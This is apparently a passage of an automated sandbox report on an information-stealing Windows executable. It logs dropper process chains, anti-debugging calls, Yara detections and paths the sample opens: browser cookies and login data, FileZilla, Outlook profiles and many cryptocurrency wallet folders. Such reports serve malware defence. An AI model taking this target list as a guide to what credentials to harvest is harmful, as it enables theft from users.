Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00419160 mov eax, dword ptr fs:[00000030h] 0_2_00419160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041C8D9 SetUnhandledExceptionFilter, 0_2_0041C8D9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A718 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0041A718
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C5BB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C5BB1F7
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C76AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C76AC62
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004190A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_004190A0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe "C:\Users\user\AppData\RoamingCBFCFBFBFB.exe"
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe "C:\Users\user\AppData\RoamingIJDGCAEBFI.exe"
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe "C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\ee7a49fbf0.exe "C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2E3C.tmp\2E3D.tmp\2E3E.bat C:\Users\user\1000003002\ee7a49fbf0.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: RoamingCBFCFBFBFB.exe, RoamingCBFCFBFBFB.exe, 00000005.00000002.2284013109.000000000093C000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, axplong.exe, 00000009.00000002.2310490421.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp, axplong.exe, 0000000A.00000002.2310162884.0000000000D0C000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Program Manager
Source: explorti.exe, 0000000E.00000002.2338932690.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 0000000F.00000002.2339600166.000000000085A000.00000040.00000001.01000000.0000000F.sdmp, explorti.exe, 00000013.00000002.3274900167.000000000085A000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: >Program Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BB341 cpuid 0_2_6C5BB341
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00417630
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\1000003002\ee7a49fbf0.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000002001\48f0ec6733.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA, 0_2_00417420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA, 0_2_004172F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 0_2_004174D0
Source: Amcache.hve.13.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.13.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 14.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.RoamingIJDGCAEBFI.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.explorti.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.RoamingCBFCFBFBFB.exe.750000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.axplong.exe.b20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000003.2270021811.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2298982313.00000000048F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2307792347.0000000000E71000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2298393028.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2263477354.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.3273644345.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2269241540.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2655374647.00000000048A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2339495217.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2338863000.0000000000661000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2309993575.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3280286776.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2310315083.0000000000B21000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2654668083.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2237950583.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2283696962.0000000000751000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe String found in binary or memory: lockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exo
Source: file.exe String found in binary or memory: us|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|M
Source: file.exe String found in binary or memory: \jaxx\Local Storage\
Source: file.exe String found in binary or memory: passphrase.json
Source: file.exe String found in binary or memory: \Ethereum\
Source: file.exe String found in binary or memory: Ethereum
Source: file.exe String found in binary or memory: file__0.localstorage
Source: file.exe String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe String found in binary or memory: ltiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.js
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000002C.00000002.2900300016.00000000024CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2792599866.0000000002717000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2443461235.0000000002736000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 48f0ec6733.exe PID: 7884, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 3436, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770C40 sqlite3_bind_zeroblob, 0_2_6C770C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C770D60 sqlite3_bind_parameter_name, 0_2_6C770D60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C698EA0 sqlite3_clear_bindings, 0_2_6C698EA0